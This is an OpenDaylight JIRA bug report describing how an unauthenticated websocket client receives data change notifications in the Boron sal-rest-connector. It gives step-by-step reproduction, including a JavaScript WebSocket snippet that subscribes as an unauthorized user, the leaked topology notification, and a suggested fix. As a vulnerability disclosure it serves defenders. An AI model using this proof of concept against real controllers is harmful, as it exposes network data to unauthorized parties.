[NETCONF-300] unauthorized websocket client is able to receivedata change notifications via sal-rest-connector

Relates — Tue, 13 Aug 2019 13:17:40 +0000

short story:
unauthorized websocket client is able to receivedata change notifications via sal-rest-connector
if data-change-event-subscription was previously created by authorized user.

setup environment:
------------------
1. start odl distribution-karaf-0.5.0-Boron
2. install features:
feature:install odl-restconf
feature:install odl-dlux-all
feature:install odl-ovsdb-southbound-impl
log:set DEBUG org.opendaylight.netconf.sal

test authorization:
-------------------
3. try POST request using postman without authorization
request: POST http://localhost:8181/restconf/config/network-topology:network-topology
response: 401 unauthorized
request: POST http://localhost:8181/restconf/config/network-topology:network-topology using Basic http authorization
response: 200 + data returned from server
4.
POST: http://localhost:8181/restconf/operations/sal-remote:create-data-change-event-subscription
<input xmlns="urn:opendaylight:params:xml:ns:yang:controller:md:sal:remote">
<path xmlns:a="urn:TBD:params:xml:ns:yang:network-topology">/a:network-topology</path>
<datastore xmlns="urn:sal:restconf:event:subscription">CONFIGURATION</datastore>
<scope xmlns="urn:sal:restconf:event:subscription">BASE</scope>
</input>

create data-change-event-subscription by authorized user:
---------------------------------------------------------
5. with postman
using Basic http authorization
POST: http://localhost:8181/restconf/streams/stream/data-change-event-subscription/network-topology:network-topology/datastore=CONFIGURATION/scope=BASE
<input xmlns="urn:opendaylight:params:xml:ns:yang:controller:md:sal:remote">
<path xmlns:a="urn:TBD:params:xml:ns:yang:network-topology">/a:network-topology</path>
<datastore xmlns="urn:sal:restconf:event:subscription">CONFIGURATION</datastore>
<scope xmlns="urn:sal:restconf:event:subscription">BASE</scope>
</input>
response: 200
{
"output":

{ "stream-name": "data-change-event-subscription/network-topology:network-topology/datastore=CONFIGURATION/scope=BASE" }

}
6.
using Basic http authorization
GET http://localhost:8181/restconf/streams/stream/data-change-event-subscription/network-topology:network-topology/datastore=CONFIGURATION/scope=BASE
response: 200
ws://localhost:8185/data-change-event-subscription/network-topology:network-topology/datastore=CONFIGURATION/scope=BASE

receive data change events as not authorized user:
--------------------------------------------------
7. from web browser (chrome: new incognito tab) as not authorized user, open login page of ODL dlux http://localhost:8181/index.html, press F12 to start javascript console
in console, write small javascript to subscribe to websocket for data change notifications:
var WSocket = new WebSocket('ws://localhost:8185/data-change-event-subscription/network-topology:network-topology/datastore=CONFIGURATION/scope=BASE');
WSocket.onmessage = function(event)

{ console.log('Unauthorized Data Access: ' + event.data); }

;
8. from POSTMAN
using Basic http authorization application/xml
PUT http://localhost:8181/restconf/config/network-topology:network-topology
<network-topology xmlns="urn:TBD:params:xml:ns:yang:network-topology">
<topology xmlns="urn:TBD:params:xml:ns:yang:network-topology">
<topology-id>network-topo:2</topology-id>
<link>
<link-id>l3</link-id>
<source>
<source-node>n4</source-node>
</source>
<destination>
<dest-node>n5</dest-node>
</destination>
</link>
<link>
<link-id>l2</link-id>
<source>
<source-node>n5</source-node>
</source>
<destination>
<dest-node>n6</dest-node>
</destination>
</link>
<node>
<node-id>n4</node-id>
</node>
<node>
<node-id>n5</node-id>
</node>
<node>
<node-id>n6</node-id>
</node>
</topology>
</network-topology>

9. not authorized instance of chrome browser receives notification about data store change
Unauthorized Data Access: <?xml version="1.0" encoding="UTF-8" standalone="no"?>
<notification xmlns="urn:ietf:params:xml:ns:netconf:notification:1.0">
<eventTime>2016-10-19T03:56:24+02:00</eventTime>
<data-changed-notification xmlns="urn:opendaylight:params:xml:ns:yang:controller:md:sal:remote">
<data-change-event>
<path xmlns:edqn="urn:TBD:params:xml:ns:yang:network-topology">/edqn:network-topology</path>
<operation>updated</operation>
<data>
<network-topology xmlns="urn:TBD:params:xml:ns:yang:network-topology">
<topology>
<topology-id>network-topo:2</topology-id>
<link>
<link-id>l3</link-id>
<destination>
<dest-node>n5</dest-node>
</destination>
<source>
<source-node>n4</source-node>
</source>
</link>
<link>
<link-id>l2</link-id>
<destination>
<dest-node>n6</dest-node>
</destination>
<source>
<source-node>n5</source-node>
</source>
</link>
<node>
<node-id>n6</node-id>
</node>
<node>
<node-id>n5</node-id>
</node>
<node>
<node-id>n4</node-id>
</node>
</topology>
</network-topology>
</data>
</data-change-event>
</data-changed-notification>
</notification>

10. how to fix the problem:
in project netconf/restconf/sal-rest-connector/src/main/java
org.opendaylight.netconf.sal.streams.websockets.WebSocketServerHandler
in method
private void handleHttpRequest(final ChannelHandlerContext ctx, final FullHttpRequest req) throws Exception;
user's identity must be checked before listener is registered

OpenDaylight JIRA

[NETCONF-300] unauthorized websocket client is able to receivedata change notifications via sal-rest-connector